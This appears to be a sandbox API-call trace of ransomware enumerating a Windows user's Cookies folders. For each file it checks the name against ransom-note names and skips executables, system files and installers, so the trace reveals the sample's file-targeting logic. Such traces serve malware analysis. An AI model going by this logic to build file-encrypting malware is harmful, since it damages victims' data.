lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1e658910, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x1e658910, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1e658910, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x6f, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt", cAlternateFileName="5PB43E~1.TXT")) returned 1 [0084.072] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt", lpString2=".") returned 1 [0084.072] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt", lpString2="..") returned 1 [0084.072] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.072] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt", lpString2="Decryptor_Info.hta") returned -1 [0084.072] PathFindExtensionW (pszPath="5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt") returned=".txt" [0084.072] lstrcmpiW (lpString1=".txt", lpString2=".exe") returned 1 [0084.072] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0084.072] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0084.072] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0084.072] lstrcmpiW (lpString1=".txt", lpString2=".msi") returned 1 [0084.072] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77cf48 [0084.072] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x77d178 [0084.072] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cf48 | out: hHeap=0x6d0000) returned 1 [0084.072] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77d528 [0084.072] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d178 | out: hHeap=0x6d0000) returned 1 [0084.072] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1dcf9270, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x1dcf9270, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1dcf9270, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x6e, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@everesttech[1].txt", cAlternateFileName="5P5NRG~4.TXT")) returned 1 [0084.072] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@everesttech[1].txt", lpString2=".") returned 1 [0084.072] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@everesttech[1].txt", lpString2="..") returned 1 [0084.072] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@everesttech[1].txt", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.073] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@everesttech[1].txt", lpString2="Decryptor_Info.hta") returned -1 [0084.073] PathFindExtensionW (pszPath="5p5nrgjn0js_halpmcxz@everesttech[1].txt") returned=".txt" [0084.073] lstrcmpiW (lpString1=".txt", lpString2=".exe") returned 1 [0084.073] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0084.073] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0084.073] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0084.073] lstrcmpiW (lpString1=".txt", lpString2=".msi") returned 1 [0084.073] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77cf48 [0084.073] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x77d178 [0084.073] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cf48 | out: hHeap=0x6d0000) returned 1 [0084.073] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77d610 [0084.073] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d178 | out: hHeap=0x6d0000) returned 1 [0084.073] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86af2d0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x2c7870d0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x2c7870d0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x114, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@google[2].txt", cAlternateFileName="5P5NRG~2.TXT")) returned 1 [0084.073] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@google[2].txt", lpString2=".") returned 1 [0084.073] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@google[2].txt", lpString2="..") returned 1 [0084.073] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[2].txt", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.073] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[2].txt", lpString2="Decryptor_Info.hta") returned -1 [0084.073] PathFindExtensionW (pszPath="5p5nrgjn0js_halpmcxz@google[2].txt") returned=".txt" [0084.073] lstrcmpiW (lpString1=".txt", lpString2=".exe") returned 1 [0084.074] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0084.074] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0084.074] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0084.074] lstrcmpiW (lpString1=".txt", lpString2=".msi") returned 1 [0084.074] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77cf48 [0084.074] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x77d178 [0084.074] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cf48 | out: hHeap=0x6d0000) returned 1 [0084.074] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77d6f8 [0084.074] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d178 | out: hHeap=0x6d0000) returned 1 [0084.074] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1dcf9270, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x1dcf9270, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1dcf9270, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x56, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@ml314[1].txt", cAlternateFileName="5P0DBF~1.TXT")) returned 1 [0084.074] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@ml314[1].txt", lpString2=".") returned 1 [0084.074] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@ml314[1].txt", lpString2="..") returned 1 [0084.074] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ml314[1].txt", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.074] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ml314[1].txt", lpString2="Decryptor_Info.hta") returned -1 [0084.074] PathFindExtensionW (pszPath="5p5nrgjn0js_halpmcxz@ml314[1].txt") returned=".txt" [0084.074] lstrcmpiW (lpString1=".txt", lpString2=".exe") returned 1 [0084.075] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0084.075] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0084.075] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0084.075] lstrcmpiW (lpString1=".txt", lpString2=".msi") returned 1 [0084.075] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77cf48 [0084.075] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x77d178 [0084.075] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cf48 | out: hHeap=0x6d0000) returned 1 [0084.075] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77d7e0 [0084.075] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d178 | out: hHeap=0x6d0000) returned 1 [0084.075] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1e5e64f0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x1e5e64f0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1e5e64f0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x19e, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@rlcdn[2].txt", cAlternateFileName="5P94E6~1.TXT")) returned 1 [0084.075] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@rlcdn[2].txt", lpString2=".") returned 1 [0084.075] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@rlcdn[2].txt", lpString2="..") returned 1 [0084.075] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@rlcdn[2].txt", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.075] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@rlcdn[2].txt", lpString2="Decryptor_Info.hta") returned -1 [0084.075] PathFindExtensionW (pszPath="5p5nrgjn0js_halpmcxz@rlcdn[2].txt") returned=".txt" [0084.075] lstrcmpiW (lpString1=".txt", lpString2=".exe") returned 1 [0084.075] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0084.075] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0084.075] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0084.076] lstrcmpiW (lpString1=".txt", lpString2=".msi") returned 1 [0084.076] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77cf48 [0084.076] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x77d178 [0084.076] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cf48 | out: hHeap=0x6d0000) returned 1 [0084.076] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77d8c8 [0084.076] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d178 | out: hHeap=0x6d0000) returned 1 [0084.076] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe3980940, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0084.076] lstrcmpW (lpString1="index.dat", lpString2=".") returned 1 [0084.076] lstrcmpW (lpString1="index.dat", lpString2="..") returned 1 [0084.076] lstrcmpiW (lpString1="index.dat", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.076] lstrcmpiW (lpString1="index.dat", lpString2="Decryptor_Info.hta") returned 1 [0084.076] PathFindExtensionW (pszPath="index.dat") returned=".dat" [0084.076] lstrcmpiW (lpString1=".dat", lpString2=".exe") returned -1 [0084.076] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0084.076] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0084.076] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0084.076] lstrcmpiW (lpString1=".dat", lpString2=".msi") returned -1 [0084.077] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2bc9ae40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52878dd0, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x52878dd0, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0084.077] lstrcmpW (lpString1="Low", lpString2=".") returned 1 [0084.077] lstrcmpW (lpString1="Low", lpString2="..") returned 1 [0084.077] lstrlenW (lpString="Low") returned 3 [0084.077] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpString2="Low" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low" [0084.077] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0084.077] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0084.077] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x72a920 [0084.083] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.083] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2bc9ae40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52878dd0, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x52878dd0, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.086] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.086] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.086] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x44eb6480, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x44eb6480, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x44eb6480, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt", cAlternateFileName="5P9943~1.TXT")) returned 1 [0084.086] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt", lpString2=".") returned 1 [0084.086] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt", lpString2="..") returned 1 [0084.086] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.086] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt", lpString2="Decryptor_Info.hta") returned -1 [0084.086] PathFindExtensionW (pszPath="5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt") returned=".txt" [0084.087] lstrcmpiW (lpString1=".txt", lpString2=".exe") returned 1 [0084.087] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0084.087] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0084.087] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0084.087] lstrcmpiW (lpString1=".txt", lpString2=".msi") returned 1 [0084.087] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77cf48 [0084.087] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x77d9b0 [0084.087] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cf48 | out: hHeap=0x6d0000) returned 1 [0084.087] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x77dab8 [0084.087] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d9b0 | out: hHeap=0x6d0000) returned 1 [0084.087] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x44bd95f0, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x44bd95f0, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x44bd95f0, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt", cAlternateFileName="5P37D9~1.TXT")) returned 1 [0084.087] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt", lpString2=".") returned 1 [0084.087] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt", lpString2="..") returned 1 [0084.087] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.087] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt", lpString2="Decryptor_Info.hta") returned -1 [0084.087] PathFindExtensionW (pszPath="5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt") returned=".txt" [0084.087] lstrcmpiW (lpString1=".txt", lpString2=".exe") returned 1 [0084.087] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0084.088] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0084.088] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0084.088] lstrcmpiW (lpString1=".txt", lpString2=".msi") returned 1 [0084.088] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77cf48 [0084.088] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x77d178 [0084.088] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cf48 | out: hHeap=0x6d0000) returned 1 [0084.088] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x77d9b0 [0084.088] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d178 | out: hHeap=0x6d0000) returned 1 [0084.088] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf73d210, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf73d210, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf73d210, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x5d, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@adformdsp[1].txt", cAlternateFileName="5P2CBA~1.TXT")) returned 1 [0084.088] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@adformdsp[1].txt", lpString2=".") returned 1 [0084.088] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@adformdsp[1].txt", lpString2="..") returned 1 [0084.088] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adformdsp[1].txt", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.088] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adformdsp[1].txt", lpString2="Decryptor_Info.hta") returned -1 [0084.088] PathFindExtensionW (pszPath="5p5nrgjn0js_halpmcxz@adformdsp[1].txt") returned=".txt" [0084.088] lstrcmpiW (lpString1=".txt", lpString2=".exe") returned 1 [0084.088] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0084.088] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0084.088] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0084.088] lstrcmpiW (lpString1=".txt", lpString2=".msi") returned 1 [0084.089] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77cf48 [0084.089] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x77d178 [0084.089] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cf48 | out: hHeap=0x6d0000) returned 1 [0084.089] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x77dbc0 [0084.089] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d178 | out: hHeap=0x6d0000) returned 1 [0084.089] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf2a0770, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf7d5790, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf7d5790, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0xea, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@adform[1].txt", cAlternateFileName="5P8600~1.TXT")) returned 1 [0084.089] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@adform[1].txt", lpString2=".") returned 1 [0084.089] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@adform[1].txt", lpString2="..") returned 1 [0084.089] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adform[1].txt", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.089] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adform[1].txt", lpString2="Decryptor_Info.hta") returned -1 [0084.089] PathFindExtensionW (pszPath="5p5nrgjn0js_halpmcxz@adform[1].txt") returned=".txt" [0084.089] lstrcmpiW (lpString1=".txt", lpString2=".exe") returned 1 [0084.089] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0084.089] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0084.089] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0084.089] lstrcmpiW (lpString1=".txt", lpString2=".msi") returned 1 [0084.089] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77cf48 [0084.089] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x77d178 [0084.089] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cf48 | out: hHeap=0x6d0000) returned 1 [0084.090] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77dcb8 [0084.090] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d178 | out: hHeap=0x6d0000) returned 1 [0084.090] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbe5d5130, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0x45f08810, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x45f08810, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x242, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@adnxs[1].txt", cAlternateFileName="5P89EF~1.TXT")) returned 1 [0084.090] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@adnxs[1].txt", lpString2=".") returned 1 [0084.090] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@adnxs[1].txt", lpString2="..") returned 1 [0084.090] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adnxs[1].txt", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.090] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adnxs[1].txt", lpString2="Decryptor_Info.hta") returned -1 [0084.090] PathFindExtensionW (pszPath="5p5nrgjn0js_halpmcxz@adnxs[1].txt") returned=".txt" [0084.090] lstrcmpiW (lpString1=".txt", lpString2=".exe") returned 1 [0084.090] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0084.090] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0084.090] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0084.090] lstrcmpiW (lpString1=".txt", lpString2=".msi") returned 1 [0084.090] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77cf48 [0084.090] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x77d178 [0084.090] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cf48 | out: hHeap=0x6d0000) returned 1 [0084.090] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77dda0 [0084.090] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d178 | out: hHeap=0x6d0000) returned 1 [0084.090] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x52fcb4b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52fcb4b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52fcb4b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@adtech[2].txt", cAlternateFileName="5PC5B2~1.TXT")) returned 1 [0084.090] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@adtech[2].txt", lpString2=".") returned 1 [0084.091] lstrcmpW (lpString1="5p5nrgjn0js_halpmcxz@adtech[2].txt", lpString2="..") returned 1 [0084.091] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtech[2].txt", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.091] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adtech[2].txt", lpString2="Decryptor_Info.hta") returned -1 [0084.091] PathFindExtensionW (pszPath="5p5nrgjn0js_halpmcxz@adtech[2].txt") returned=".txt" [0084.091] lstrcmpiW (lpString1=".txt", lpString2=".exe") returned 1 [0084.091] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0084.091] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0084.091] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0084.091] lstrcmpiW (lpString1=".txt", lpString2=".msi") returned 1 [0084.091] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77cf48 [0084.091] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x77d178 [0084.091] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cf48 | out: hHeap=0x6d0000) returned 1 [0084.091] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77de88 [0084.091] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d178 | out: hHeap=0x6d0000) returned 1 [0084.091] FindNextFileW (in: 